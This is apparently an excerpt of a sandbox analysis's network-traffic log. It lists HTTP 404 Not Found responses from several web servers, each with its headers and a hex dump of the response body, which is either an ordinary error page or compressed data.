Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 09:34:35 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Sun, 02 Oct 2022 12:42:28 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4677Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 28 a5 1e fc 61 7b e3 38 6a 6f 8e 17 74 1e c2 45 49 2e fb b6 b1 d1 1f 36 b2 b2 ac 14 f6 71 5e 09 9d 3e 04 59 8a 5a a9 b3 ae 51 08 8e 8d e9 fc 48 ac 5d f3 72 42 69 73 5f 89 34 95 3a 1f 1e 8c 4a 61 72 a9 f9 21 63 0f fb 99 28 a5 6a 86 05 aa 29 3a 99 88 d1 9f cb 7b 7b de 64 21 35 9a fb ee ce cf 07 d5 1c 44 ed 68 34 93 a9 2b 86 bf fe f2 6b 35 df 79 03 f6 1c 55 ec f7 fd 44 24 77 b9 a1 5a a7 7d 59 8a 1c 87 b5 51 4f 9f 2c f5 86 35 1b f1 49 3e ff 69 36 f8 a3 ca 9f 3c 1b ad 5d 32 58 a1 70 43 4d dd d3 c6 e4 02 65 5e b8 e1 e1 57 68 94 32 fd 2e 1a 7c 7e 90 cb 6c 27 89 f6 a7 df 7c 83 fa 76 2c ec e5 c2 91 99 90 73 54 de 57 64 a5 93 a4 19 47 09 27 a7 38 52 98 b9 e1 d1 0b 46 c9 14 f1 00 ff fe 4f 00 e7 f3 f9 fd da e1 45 ac c7 3e 99 a3 17 ff c6 df 87 fc 38 82 2e b1 90 56 fb d5 3f 5c a4 f7 f5 09 7e 09 b5 5b 9f e2 4b d5 17 4a e6 7a 98 f0 16 9a ef 70 a0 83 83 3d 34 86 4c 42 29 de 87 e2 59 f9 0f 1c 1e 79 ae e1 75 d6 46 f9 eb c1 c1 b7 e2 4d 84 de ae e6 01 ff fb d6 eb 05 59 87 e9 a4 b9 df 1e bf 62 f7 f3 f3 05 3b eb 1a 85 43 e9 d8 83 64 b4 35 f1 5b 07 26 54 57 a4 ef 13 52 64 86 7b 2f 5f 1d 1c 6c 0e fb 79 e7 b0 6f 04 cf d1 59 27 0c 2b 02 f1 c5 11 47 87 3b 47 fc 8b fe af 8d 5c 84 e0 fd 3f 7a fe c5 4a 4c c8 39 2a 19 e5 7e 22 92 bb dc 50 ad d3 be 2c 45 8e c3 da a8 a7 4f a2 24 97 7d db d8 28 ac d9 88 4f b6 57 06 b9 cc 9e 3c 1b ad dd 32 58 21 b7 53 53 f7 b4 51 c8 a2 d5 72 78 fc ed e5 cc c4 e7 4f ab fd 85 1e 78 1e 22 0e df 23 a8 44 9a 4a 9d 0f e1 b0 4d be fd 19 41 a2 50 98 21 33 2d be 75 9a 48 12 32 a9 e4 36 ac c2 81 17 07 3f 8e a0 95 01 bf 3c 67 ec 11 94 52 f7 3b 31 3c ad 5d ea 98 1d 80 a8 1d 8d c0 e1 dc f5 39 c6 9c d7 12 06 47 f3 dd 24 a0 56 70 bf 8e a3 30 73 df 8f 42 bb 51 1e 3d fa 66 04 25 61
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 09:34:37 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Sun, 02 Oct 2022 12:42:28 GMTAccept-Ranges: bytesContent-Length: 11816Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 09 09 3c 21 2d 2d 20 41 64 64 20 53 6c 69 64 65 20 4f 75 74 73 20 2d 2d 3e 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 20 20 20 20 20 20 20 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 67 69 2d 73 79 73 2f 6a 73 2f 73 69 6d 70 6c 65 2d 65 78 70 61 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 32 30 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 74 6f 70 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 74 6f 70 5f 77 2e 6a 70 67 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 68 65 69 67 68 74 3a 31 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 6d 69 64 2e 67 69 66 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 79 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Tue, 29 Nov 2022 09:35:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Request-Id: 80efbcd2-9125-405a-a05b-a8e27ff167dbX-Runtime: 0.057525Content-Encoding: gzipData Raw: 31 34 31 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 3c eb 73 da c6 b7 df f3 57 ec 0f cf 2d b8 35 e2 e1 37 01 77 08 e0 57 6d 70 31 71 92 66 32 54 a0 05 14 0b 49 91 84 31 ee ed fd db ef 39 67 77 a5 15 18 c7 b5 7b 3f dc 99 c4 d3 44 96 76 cf fb b5 bb 67 5b fd 4f b3 d3 e8 7d ba 6a b1 49 34 75 8e de 54 f1 1f e6 98 ee b8 96 e1 6e 06 5f 70 d3 3a 7a c3 58 75 ca 23 93 0d 27 66 10 f2 a8 96 99 45 a3 fc 41 86 15 e8 53 64 47 0e 3f aa 0f 23 db 73 59 c3 73 a3 c0 73 1c 1e 54 58 eb 7e c8 7d 7a 3b 34 67 e3 49 54 2d 88 a1 38 29 8c 16 30 09 9e 18 1b 78 d6 82 fd 45 8f f0 8b 39 bc 1d 07 de cc b5 f2 43 cf f1 00 ca c6 71 1d 7f de ca 01 ea ed f6 f6 b6 7a 35 35 83 b1 ed 56 58 d1 bf 17 af fe 7e 13 03 de 62 fe 16 f3 9c 2d 36 83 ff 22 2b c6 33 02 3a f3 23 73 6a 3b 8b 0a 9b 70 e7 8e 47 f6 d0 dc 62 77 3c b0 4c 17 1e cc c0 36 61 4a 68 ba 61 3e e4 81 3d 52 d8 68 66 68 3f f0 0a 90 5b da 56 38 19 73 6c 97 e7 27 dc 06 4e 2b ac 74 b0 44 8c 1f f0 34 72 01 a2 54 4a 00 cc 27 76 c4 f3 a1 6f 0e 01 36 8c cf cf 03 d3 4f 71 04 2f 8d 81 77 9f 48 cb 0b 2c 94 34 00 61 a1 e7 d8 16 db 68 b5 5a 8a 52 df b4 2c db 1d c3 e7 58 32 8c ad 08 8b b1 b9 6d 45 93 0a 3b dc 5d a6 19 b5 cf 83 18 5b ac 90 e2 31 fc 28 2c 89 c6 40 57 8d dd f2 71 79 67 85 80 a2 b1 cb a7 ac 84 7f a7 f8 99 94 62 e0 31 5d 46 19 86 c6 d0 d3 42 35 4a 0a 00 63 9a 1e 60 46 1a 6c 79 85 e6 34 61 29 a8 e5 dd 25 55 19 16 18 bb ed 84 4f 89 b9 59 c4 9f 58 06 a4 87 7c 60 5a f6 2c ac b0 9d 44 a7 8a 2d 20 3c b1 4f c6 2c 3b f4 1d 13 4c 6f e0 78 c3 5b 05 46 29 62 7f 59 11 46 38 9b 02 a4 c4 4d 62 d5 c2 48 56 8a 19 40 67 22 4a 06 5e 14 79 d3 94 61 a4 29 7e 8c 00 e9 36 31 fb ba c9 2a 3e 56 50 55 98 eb b9 3c 25 fe 8d 21 b8 88 09 de 90 98 0e 18 2d fa 0c 59 63 4c a2 f4 d6 d8 00 4b c5 e2 7f ad 9a ce 23 66 63 84 de 2c 18 72 f6 f3 aa f5 24 92 8f 45 b4 1c 16 d4 ec bf 54 c8 59 75 a2 e6 21 fe c4 da 8d 63 12 58 78 ab 81 3f cf d0 98 20 51 97 61 ca 1f 75 6b 10 12 79 44 92 8a 54 c3 32 21 fc 2a 82 35 cb 3f 48 24 e6 41 e8 1a 39 de bc c2 cc 59 e4 ad d2 9e c4 d3 e3 e3 94 ba 0c db 1d 79 31 f0 44 6c 2b de 9a a6 c6 40 27 ea bb b3 e9 80 07 9a ab ac c6 ef b4 c4 54 10 a9 d7 e3 90 9e c8 05 9c 24 c1 1a 1b 73 20 43 6a 12 e4 9a cd a6 62 30 e2 f7 51 de 74 ec 31 24 00 1a 98 e6 0d 89 5c e6 2d ef f0 11 86 68 2d 2a 2e 87 de 55 20 95 09 0a 38 09 09 ab 7c 1e ef e1 cf ea 4c c3 84 d4 78 97 50 f1 58 8a 3b 6e c0 9f f4 d4 89 6d 59 dc 8d 11 c6 0e bb e2 6e 60 18 4c 49 f5 f0 a0 78 58 dc 7d cb fe 26 db 36 2b 77 76 08 39 05 d2 5e 3c 62 6f 6f 2f fe 6c 44 01 e4 9a fc 28 30 a7 1c 54 f8 e8 18 c5 77 fc 51 46 52 85 22 05 c3 08 b9 c3 87 69 84 62 3c 0c 97 ee b6 01 d9 3d e2 fd c8 1c 38 4a 26 71 ec 17 12 90 01 02 78 72 4c 3f 84 5c a8 9e f0 33 c1 49 c1 88 30 4d b1 48 e9 66 29 02 96 13 ab b1 2c eb 69 08 90 5b 31 6c 4a 99 2f 01 52 72 5f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Tue, 29 Nov 2022 09:35:04 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Request-Id: 83a2ff74-2211-4d80-b80d-6219366e0ae4X-Runtime: 0.045031Content-Encoding: gzipData Raw: 31 33 34 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5c 6b 57 db 46 b7 fe 9e 5f 31 35 eb d4 26 c5 f2 85 5b 20 98 2e 6a 0c a1 25 90 82 d3 26 cd ca 72 85 35 b6 55 64 c9 91 64 2e e9 9b f7 b7 9f 67 ef 99 91 46 36 26 14 7a 3e 9c b5 12 56 13 21 cd ec fb 6d 66 f6 74 e7 bb fd d3 76 f7 fd 9b 8e 18 a5 e3 60 f7 d9 0e fd 23 02 37 1c b6 4a 32 2c d1 0b e9 7a bb cf 84 d8 19 cb d4 15 fd 91 1b 27 32 6d 95 a6 e9 a0 fa a2 24 6a fc 29 f5 d3 40 ee ee f5 53 3f 0a 45 3b 0a d3 38 0a 02 19 6f 8b ce 4d 5f 4e f8 6d df 9d 0e 47 e9 4e 4d 0d a5 49 49 7a 8b 49 78 12 e2 22 f2 6e c5 df fc 88 5f dc fe e5 30 8e a6 a1 57 ed 47 41 04 28 4b 07 7b f4 f3 52 0f 30 6f 57 57 57 cd ab b1 1b 0f fd 70 5b d4 27 37 ea d5 97 67 19 e0 15 31 59 11 51 b0 22 a6 f8 2f f5 32 3c 03 d0 59 1d b8 63 3f b8 dd 16 23 19 5c c9 d4 ef bb 2b e2 4a c6 9e 1b e2 c1 8d 7d 17 53 12 37 4c aa 89 8c fd 81 c1 c6 33 13 ff b3 dc 06 b9 8d 55 83 53 88 c0 0f 65 75 24 7d 70 ba 2d 1a 2f 66 88 99 c4 b2 88 5c 81 68 34 72 00 d7 23 3f 95 d5 64 e2 f6 01 1b e3 ab d7 b1 3b 29 70 84 97 ce 45 74 93 4b 2b 8a 3d 92 34 80 88 24 0a 7c 4f 2c 75 3a 1d 43 e9 c4 f5 3c 3f 1c e2 73 26 19 21 e6 84 25 c4 b5 ef a5 a3 6d b1 b5 3e 4b 33 69 5f c6 19 b6 4c 21 f5 03 fc 18 2c b9 c6 a0 ab f6 7a f3 a0 b9 36 47 40 dd 59 97 63 d1 a0 bf 0b fc 8c 1a 19 f0 8c 2e a7 89 a1 19 f4 a2 50 9d 86 01 20 84 a5 07 cc 28 82 6d ce d1 5c 24 ac 00 b5 b9 3e a3 2a c7 83 b1 fb 41 72 9f 98 f7 eb f4 93 c9 80 f5 50 8d 5d cf 9f 26 db 62 2d d7 a9 61 0b 84 e7 f6 29 84 e7 27 93 c0 85 e9 5d 04 51 ff d2 80 31 8a d8 9c 55 84 93 4c c7 80 94 bb 49 a6 5a 8c 14 8d 8c 01 72 26 a6 e4 22 4a d3 68 5c 30 8c 22 c5 77 11 a0 dd 26 63 df 36 59 c3 c7 1c aa 6d 11 46 a1 2c 88 7f a9 0f 17 71 e1 0d b9 e9 c0 68 c9 67 d8 1a 33 12 b5 b7 66 06 d8 a8 d7 ff 67 de 74 ee 30 1b 27 89 a6 71 5f 8a e7 f3 d6 93 4b 3e 13 d1 6c 58 30 b3 ff 36 21 67 de 89 f6 b7 e8 27 d3 6e 16 93 60 e1 9d 36 fd 3c 40 63 8a 44 5b 86 05 7f b4 ad 41 49 e4 0e 49 1a 52 1d cf 45 f8 35 04 5b 96 ff 22 97 58 84 d0 35 08 a2 eb 6d e1 4e d3 68 9e f6 3c 9e 1e 1c 14 d4 e5 f8 e1 20 ca 80 e7 62 9b f3 d6 22 35 0e 39 51 2f 9c 8e 2f 64 6c b9 ca 7c fc 2e 4a cc 04 91 bd bd 2c a4 e7 72 81 93 e4 58 33 63 8e 75 48 cd 83 dc fe fe be 61 30 95 37 69 d5 0d fc 21 12 00 0f 2c f2 46 44 ce f2 56 0d e4 80 42 b4 15 15 67 43 ef 3c 90 ed 11 09 38 0f 09 f3 7c 1e 6c d0 cf fc 4c c7 45 6a bc ca a9 b8 2b c5 1d b4 f1 a7 38 75 e4 7b 9e 0c 33 84 99 c3 ce b9 1b 0c 43 18 a9 6e bd a8 6f d5 d7 5f 8a 2f 6c db ee f6 95 9f 20 a7 20 ed 65 23 36 36 36 b2 cf 4e 1a 23 d7 54 07 b1 3b 96 50 e1 9d 63 0c df d9 47 1d 49 0d 8a 02 0c 27 91 81 ec 17 11 aa f1 18 ae dd 6d 09 d9 3d 95 bd d4 bd 08 8c 4c b2 d8 af 24 a0 03 04 78 0a dc 49 82 5c 68 9e e8 33 c3 29 c0 48 29 4d 89 d4 e8 66 26 02 36 73 ab f1 3c ef 7e 08 c8 ad 14 36 b5 cc 67 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Tue, 29 Nov 2022 09:35:08 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Tue, 29 Nov 2022 09:35:11 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Tue, 29 Nov 2022 09:35:13 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 